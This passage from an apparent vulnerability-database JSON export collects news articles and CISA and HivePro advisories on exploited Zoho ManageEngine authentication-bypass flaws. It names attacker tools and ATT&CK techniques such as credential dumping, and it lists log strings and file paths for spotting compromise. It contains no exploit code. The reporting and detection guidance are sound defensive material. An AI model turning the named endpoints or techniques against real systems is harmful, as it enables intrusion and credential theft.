DEV-0322, a group operating out of China, \u201cbased on observed infrastructure, victimology, tactics, and procedures.\u201d\n\nMicrosoft\u2019s Threat Intelligence Center (MSTIC) has previously detected DEV-0322 taking part in attacks targeting the SolarWinds Serv-U software, which had a zero day \u2013 CVE-2021-35211, a remote memory escape \u2013 that SolarWinds [patched](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) in July.\n\nMSTIC researchers said that the attacks in this new round of beating up Zoho password manager are installing a custom IIS module. IIS, or Internet Information Services, is an extensible web server software created by Microsoft for use with the Windows NT family.\n\nBesides the custom IIS module, DEV-0322 also deployed a trojan that MSTIC is calling Trojan:Win64/Zebracon that uses hardcoded credentials to make connections to suspected DEV-0322-compromised [Zimbra email servers.](<https://threatpost.com/zimbra-server-bugs-email-plundering/168188/>)\n\nIn its Sept. 16 alert, CISA recommended that organizations that spot indicators of compromise related to ManageEngine ADSelfService Plus should \u201ctake action immediately.\u201d\n\nAlso, CISA strongly recommended domain-wide password resets and double Kerberos Ticket Granting Ticket (TGT) password resets, \u201cif any indication is found that the NTDS.dit file was compromised.\u201d\n\n## Classic Cyberespionage Targets: Healthcare and Energy\n\nIf the actor behind this second Zoho-focused campaign does turn out to be a Chinese APT, it won\u2019t be surprising, some said. Dave Klein, cyber evangelist and director at [Cymulate](<https://cymulate.com/>), pointed to the People\u2019s Republic of China (PRC) having a well-documented, continued interest in healthcare and energy infrastructure data.\n\nHe pointed to the [2015 breach](<https://threatpost.com/5-6-million-fingerprints-stolen-in-opm-hack/114784/>) of the U.S. Office of Personnel Management (OPM) as an example. The massive breach was overwhelmingly [attributed](<https://www.washingtonpost.com/world/national-security/chinese-hackers-breach-federal-governments-personnel-office/2015/06/04/889c0e52-0af7-11e5-95fd-d580f1c5d44e_story.html?hpid=z1>) to the PRC. It included exquisitely sensitive information, including millions of federal employees\u2019 fingerprints, Social Security numbers, dates of birth, employee performance records, employment history, employment benefits, resumes, school transcripts, military service documentation and psychological data from interviews conducted by background investigators.\n\n\u201cThe PRC got into clearance background information data including very sensitive information. Subsequently in that case they were looking for weaknesses in US classified personnel \u2013 which would include health hardships \u2013 either personally or related to them,\u201d Klein told Threapost via email on Monday.\n\nHe noted that following the OPM breach, some healthcare agencies were subsequently breached, including [Anthem Health](<https://threatpost.com/chinese-hackers-anthem-data-breach-indicted/144572/>): an attack that affected more than 78 million people. \u201cThe interest in healthcare data globally continues not only for espionage purposes against targets \u2013 building an inventory of hardships/weak points as well as seeking out healthcare data to better serve their local industries,\u201d Klein noted. \u201cOn energy, the interest is both on stealing industrial espionage information as well as to set up compromises in critical infrastructures for potential use in cases of future hostilities.\u201d\n\n## If Patching Isn\u2019t Mandatory, a Breach Is a Given\n\nMike Denapoli, lead security architect at Cymulate, added that well-documented (and patched) vulnerabilities in massively popular platforms like Microsoft Exchange and MangeEngine are ripe fruit for threat actors to pluck. Organizations that can\u2019t or won\u2019t patch are sitting ducks, he said.\n\n\u201cFor whatever the reasons may be (downtime avoidance, fear over patches disrupting workflows, etc.), attackers know these systems are vulnerable, and are making sure to take advantage of any organization that doesn\u2019t keep patching updated,\u201d Denapoli told Threatpost. \u201cWe have reached the point where patching is a must \u2013 within a reasonable amount of time \u2013 and needs to be performed. While you don\u2019t have to patch immediately, you must patch regularly. Downtime is mandatory. Testing is mandatory. If not, then a breach is mandatory.\u201d\n\n_Image courtesy of [AlphaCoders](<https://wall.alphacoders.com/big.php?i=1012166>)._\n\n110821 12:24 UPDATE: Added input from Mike Denapoli and Dave Klein.\n\n**_Cybersecurity for multi-cloud environments is notoriously challenging. OSquery and CloudQuery is a solid answer. Join Uptycs and Threatpost on Tues., Nov. 16 at 2 p.m. ET for \u201c_**[**_An Intro to OSquery and CloudQuery_**](<https://bit.ly/3wf2vTP>)**_,\u201d a LIVE, interactive conversation with Eric Kaiser, Uptycs\u2019 senior security engineer, about how this open-source tool can help tame security across your organization\u2019s entire campus._**\n\n[**_Register NOW_**](<https://bit.ly/3wf2vTP>)**_ for the LIVE event and submit questions ahead of time to Threatpost\u2019s Becky Bracken at _**[**_becky.bracken@threatpost.com_**](<mailto:becky.bracken@threatpost.com>)**_._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-08T16:38:05", "type": "threatpost", "title": "Zoho Password Manager Flaw Torched by Godzilla Webshell, New Data Stealer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211", "CVE-2021-40539"], "modified": "2021-11-08T16:38:05", "id": "THREATPOST:BC99709891AA93FC7767B53445FC2736", "href": "https://threatpost.com/zoho-password-manager-flaw-godzilla-webshell/176063/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-09T15:34:54", "description": "A critical security vulnerability in the Zoho ManageEngine ADSelfService Plus platform could allow remote attackers to bypass authentication and have free rein across users\u2019 Active Directory (AD) and cloud accounts.\n\nThe issue (CVE-2021-40539) has been actively exploited in the wild as a zero-day, according to the Cybersecurity and Infrastructure Security Agency (CISA).\n\nZoho issued a patch on Tuesday, and CISA [warned that](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>) admins should not only apply it immediately, but also ensure in general that ADSelfService Plus is not directly accessible from the internet. The issue affects builds 6113 and below (the fixed version is 6114).\n\n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThe Zoho ManageEngine ADSelfService Plus is a self-service password management and single sign-on (SSO) solution for AD and cloud apps, meaning that any cyberattacker able to take control of the platform would have multiple pivot points into both mission-critical apps (and their sensitive data) and other parts of the corporate network via AD. It is, in other words, a powerful, highly privileged application which can act as a convenient point-of-entry to areas deep inside an enterprise\u2019s footprint, for both users and attackers alike.\n\n\u201cUltimately, this underscores the threat posed to internet-facing applications,\u201d Matt Dahl, principal intelligence analyst for Crowdstrike, [noted](<https://twitter.com/voodoodahl1/status/1435673342925737991>). \u201cThese don\u2019t always get the same attention as exploit docs with decoy content, but the variety of these web-facing services gives actors lots of options.\u201d\n\nThis isn\u2019t Zoho\u2019s first zero-day rodeo. In March 2020, [researchers disclosed](<https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/>) a zero-day vulnerability in Zoho\u2019s ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones and more from a central location. The critical bug ([CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>), with a CVSS score of 9.8) allowed an unauthenticated, remote attacker to gain complete control over affected systems \u2013 \u201cbasically the worst it gets,\u201d researchers said at the time.\n\n## **Authentication Bypass and RCE**\n\nThe issue at hand is an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus, which could lead to remote code execution (RCE), according to Zoho\u2019s [knowledge-base advisory](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>).\n\n\u201cThis vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request,\u201d according to the firm. \u201cThis would allow the attacker to carry out subsequent attacks resulting in RCE.\u201d\n\nEchoing CISA\u2019s assessment, Zoho also noted that \u201cWe are noticing indications of this vulnerability being exploited.\u201d The firm characterized the issue as \u201ccritical\u201d although a CVSS vulnerability-severity rating has not yet been calculated for the bug.\n\nFurther technical details are for now scant (and no public exploit code appears to be making the rounds \u2014 yet), but Dahl noted that the zero-day attacks have been going on for quite some time:\n\n> Observed exploitation of this vuln _before_ CVE-2021-26084 (Atlassian Confluence) which got a lot of attention last week. Some very general observations:\n> \n> 1/ <https://t.co/rIfxxeBlmO>\n> \n> \u2014 Matt Dahl (@voodoodahl1) [September 8, 2021](<https://twitter.com/voodoodahl1/status/1435673338693754886?ref_src=twsrc%5Etfw>)\n\nHowever, he said that the attacks have thus far been highly targeted and limited, and possibly the work of a single (unknown, for now) actor.\n\n\u201cActor(s) appeared to have a clear objective with ability to get in and get out quickly,\u201d he tweeted.\n\nHe also noted similarities to the attacks taking place on Atlassian Confluence instances (CVE-2021-26084), which also started out as limited and targeted. However, in that case, researchers were able to \u201crapidly produce\u201d a PoC exploit, he pointed out, and eventually there was proliferation to multiple targeted-intrusion actors, usually resulting in cryptomining activity ([as seen in](<https://threatpost.com/jenkins-atlassian-confluence-cyberattacks/169249/>) the recent Jenkins attack).\n\nAtlassian Confluence, like AD SelfService Plus, allows centralized cloud access to a raft of sensitive corporate information, being a collaboration platform where business teams can organize their work in one place.\n\n## How to Know if Zoho AD SelfService Plus is Vulnerable\n\nUsers can tell if they\u2019ve been affected by taking a gander at the \\ManageEngine\\ADSelfService Plus\\logs folder to see if the following strings are found in the access log entries:\n\n * /RestAPI/LogonCustomization\n * /RestAPI/Connection\n\nZoho also said that users will find the following files in the ADSelfService Plus installation folder if running a vulnerable version:\n\n * cer in \\ManageEngine\\ADSelfService Plus\\bin folder.\n * jsp in \\ManageEngine\\ADSelfService Plus\\help\\admin-guide\\Reports folder.\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. **[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on Sept. 22 at 2 p.m. EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with independent researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T12:58:48", "type": "threatpost", "title": "Zoho ManageEngine Password Manager Zero-Day Gets Fix", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189", "CVE-2021-26084", "CVE-2021-40539"], "modified": "2021-09-09T12:58:48", "id": "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "href": "https://threatpost.com/zoho-password-manager-zero-day-attack/169303/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2022-01-24T21:31:26", "description": "THREAT LEVEL: Amber. For a detailed advisory, download the pdf file here. Zoho has patched a critical vulnerability (CVE-2021-44757) in Desktop Central and Desktop Central MSP which are unified endpoint management (UEM) solutions. A security vulnerability exists in the Desktop Central and Desktop Central MSP that allows a remote user to bypass the authentication mechanism. Successful exploitation of this issue may allow an attacker to read unauthorized data or write an arbitrary zip file on the server. Similar Zoho ManageEngine vulnerability were primarily targeted by many APT groups in the year 2021. Around 2,800 ManageEngine Desktop central instances were found to be exposed in a Shodan search. Hive Pro researcher strongly recommends that affected customers upgrade to a fixed version before any exploitation occur. Vulnerability Details Patch Link https://pitstop.manageengine.com/portal/en/community/topic/a-critical-security-patch-released-in-desktop-central-and-desktop-central-msp-for-cve-2021-44757-17-1-2022 References https://thehackernews.com/2022/01/high-severity-vulnerability-in-3.html https://securityaffairs.co/wordpress/126821/hacking/wordpress-plugins-flaws-2.html?utm_source=rss&utm_medium=rss&utm_campaign=wordpress-plugins-flaws-2 https://www.bleepingcomputer.com/news/security/zoho-plugs-another-critical-security-hole-in-desktop-central/", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-01-19T13:49:50", "type": "hivepro", "title": "Zoho ManageEngine Desktop Central affected by critical vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44757"], "modified": "2022-01-19T13:49:50", "id": "HIVEPRO:EBE89D6C841CF2A41508860258C415CD", "href": "https://www.hivepro.com/zoho-manageengine-desktop-central-affected-by-critical-vulnerability/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-12-17T07:20:56", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/11/Several-Zoho-ManageEngine-products-have-been-exploited_TA202154.pdf>)[![](chrome-extension://gmpljdlgcdkljlppaekciacdmdlhfeon/images/beside-link-icon.svg)](<https://docs.google.com/viewer?url=https%3A%2F%2Fwww.hivepro.com%2Fwp-content%2Fuploads%2F2021%2F11%2FSeveral-Zoho-ManageEngine-products-have-been-exploited_TA202154.pdf&embedded=true&chrome=false&dov=1> \"View this pdf file\" ) \n\n\nMultiple vulnerabilities have been discovered in Zoho ManageEngine products. The affected products include Zoho ManageEngine ServiceDesk Plus, Zoho ManageEngine SupportCenter Plus, Zoho ManageEngine Desktop Central, Zoho ManageEngine AssetExplorer. \nCVE 2021 44077 is a vulnerability that could allow an attacker to run arbitrary code. It was discovered on November 20, 2021. This vulnerability, however, may be easily fixed by updating to Zoho version 11306, which was released in September. Attackers are focusing on the healthcare, financial services, electronics, and IT consulting businesses by exploiting this vulnerability. \nCVE 2021 44515 & CVE 2021 44526 are authentication bypass vulnerabilities. CVE 2021 44515 only affects Zoho ManageEngine ServiceDesk and Zoho ManageEngine AssetExplorer who uses Desktop Central Agent for asset discovery and CVE 2021 44526 affects all vulnerable versions of Zoho ManageEngine ServiceDesk and Zoho ManageEngine AssetExplorer. \nTwo of these vulnerabilities (CVE 2021 44077 and CVE 2021 44515) have been exploited in the wild so organizations should upgrade their Zoho ManageEngine products to their latest versions to eliminate these vulnerabilities. \nThe Techniques used by an unknown actor to exploit CVE 2021 44077 includes: \nT1190 - Exploit Public Facing Application \nT1505.003 - Server Software Component: Web Shell \nT1027 - Obfuscated Files or Information \nT1140 - Deobfuscate/Decode Files or Information \nT1003 - OS Credential Dumping \nT1218 - Signed Binary Proxy Execution \nT1136 - Create Account \nT1003.003 - OS Credential Dumping: NTDS \nT1047 - Windows Management Instrumentation \nT1070.004 - Indicator Removal on Host: File Deletion \nT1087.002 - Account Discovery: Domain Account \nT1560.001 - Archive Collected Data: Archive via Utility \nT1573.001 - Encrypted Channel: Symmetric Cryptography[](<https://docs.google.com/viewer?url=https%3A%2F%2Fwww.hivepro.com%2Fwp-content%2Fuploads%2F2021%2F12%2FMicrosoft-could-not-patch-this-vulnerability-yet-again_TA202153.pdf&embedded=true&chrome=false&dov=1> \"View this pdf file\" )\n\n#### Vulnerability Details\n\n![](https://www.hivepro.com/wp-content/uploads/2021/12/VD-TA202154-1024x424.png)\n\n#### Indicators of Compromise(IoCs) *\n\n![](https://www.hivepro.com/wp-content/uploads/2021/12/IOC--1024x807.png)\n\n#### Patch Link\n\n<https://www.manageengine.com/desktop-management-msp/cve-2021-44515-security-advisory.html>\n\n<https://www.manageengine.com/products/service-desk/security-response-plan.html>\n\n<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44526-and-cve-2021-44515-authentication-bypass-vulnerabilities-in-servicedesk-plus-and-desktop-central>\n\n<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44526-and-cve-2021-44515-authentication-bypass-vulnerabilities-in-assetexplorer-and-desktop-central>\n\n#### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa21-336a>\n\n<https://www.bleepingcomputer.com/news/security/zoho-patch-new-manageengine-bug-exploited-in-attacks-asap/>\n\n<https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/>\n\n \n\n \n\n* Indicates parameters that apply to CVE-2021-44077", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-05T12:31:49", "type": "hivepro", "title": "Several Zoho ManageEngine products have been exploited", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44077", "CVE-2021-44515", "CVE-2021-44526"], "modified": "2021-12-05T12:31:49", "id": "HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280", "href": "https://www.hivepro.com/several-zoho-manageengine-products-have-been-exploited/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2022-01-25T11:31:01", "description": "Zoho has released a security advisory to address an authentication bypass vulnerability (CVE-2021-44757) in ManageEngine Desktop Central and Desktop Central MSP. An attacker could exploit this vulnerability to take control of an affected system.\n\nCISA encourages users and administrators to review the [Zoho Vulnerability Notification](<https://pitstop.manageengine.com/portal/en/community/topic/a-critical-security-patch-released-in-desktop-central-and-desktop-central-msp-for-cve-2021-44757-17-1-2022>) and the Zoho [ManageEngine Desktop Central](<https://www.manageengine.com/products/desktop-central/cve-2021-44757.html>) and [ManageEngine Desktop Central MSP](<https://www.manageengine.com/desktop-management-msp/cve-2021-44757.html>) security advisories and apply the recommended mitigations immediately.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/01/19/zoho-releases-security-advisory-manageengine-desktop-central-and>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-01-19T00:00:00", "type": "cisa", "title": "Zoho Releases Security Advisory for ManageEngine Desktop Central and Desktop Central MSP", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44757"], "modified": "2022-01-19T00:00:00", "id": "CISA:5AF9A0A9C471BAA02A04E99AE31ED456", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/01/19/zoho-releases-security-advisory-manageengine-desktop-central-and", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-12-17T18:11:39", "description": "Zoho has released a security advisory to address an authentication bypass vulnerability in ManageEngine Desktop Central and Desktop Central MSP. An attacker could exploit this vulnerability to take control of an affected system. According to Zoho, this vulnerability is being actively exploited in the wild.\n\nCISA encourages users and administrators to review the [Zoho Vulnerability Notification](<https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp>) and the Zoho [ManageEngine Desktop Central](<https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html>) and [ManageEngine Desktop Central MSP](<https://www.manageengine.com/desktop-management-msp/cve-2021-44515-security-advisory.html>) security advisories and apply the recommended mitigations immediately.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/12/06/zoho-releases-security-advisory-manageengine-desktop-central-and>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-06T00:00:00", "type": "cisa", "title": "Zoho Releases Security Advisory for ManageEngine Desktop Central and Desktop Central MSP", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44515"], "modified": "2021-12-06T00:00:00", "id": "CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/12/06/zoho-releases-security-advisory-manageengine-desktop-central-and", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T18:29:35", "description": "On September 16, CISA released [a joint alert ](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>)on exploitation of a vulnerability (CVE-2021-40539) in ManageEngine ADSelfService Plus. On November 8, security researchers from Palo Alto Networks and Microsoft Threat Intelligence Center (MSTIC) released separate reports on targeted attacks against ManageEngine ADSelfService Plus. \n\nCISA encourages organizations to review the indicators of compromise and other technical details in the following reports to uncover any malicious activity within their networks.\n\n * Palo Alto Networks: [Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers Godzilla Webshells, NGLite Trojan and KdcSponge Stealer](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>)\n * MSTIC: [Threat actor DEV-0322 exploiting ZOHO ManageEngine ADSelfService Plus](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>)\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/11/09/security-researchers-reveal-activity-targeting-manageengine>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-09T00:00:00", "type": "cisa", "title": "Security Researchers Reveal Activity Targeting ManageEngine ADSelfService Plus", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-09T00:00:00", "id": "CISA:2D62C340878780A9844A8FFDFA548783", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/11/09/security-researchers-reveal-activity-targeting-manageengine", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:12:13", "description": "The Federal Bureau of Investigation (FBI), CISA, and Coast Guard Cyber Command (CGCYBER) have updated the [Joint Cybersecurity Advisory (CSA)](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) published on September 16, 2021, which details the active exploitation of an authentication bypass vulnerability (CVE-2021-40539) in Zoho ManageEngine ADSelfService Plus\u2014a self-service password management and single sign-on solution.\n\nThe update provides details on a suite of tools APT actors are using to enable this campaign: \n\n * Dropper: a dropper trojan that drops Godzilla webshell on a system \n * Godzilla: a Chinese language web shell \n * NGLite: a backdoor trojan written in Go \n * KdcSponge: a tool that targets undocumented APIs in Microsoft\u2019s implementation of Kerberos for credential exfiltration \n\nNote: FBI, CISA, and CGCYBER cannot confirm the CVE-2021-40539 is the only vulnerability APT actors are leveraging as part of this activity, so it is key that network defenders focus on detecting the tools listed above in addition to initial access vector.\n\nCISA encourages organizations to review the November 19 update and apply the recommended mitigations. CISA also recommends reviewing the relevant blog posts from [Palo Alto Networks](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>), [Microsoft](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>), and [IBM Security Intelligence](<https://securityintelligence.com/posts/zero-day-discovered-enterprise-help-desk/>). \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/11/19/updated-apt-exploitation-manageengine-adselfservice-plus>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 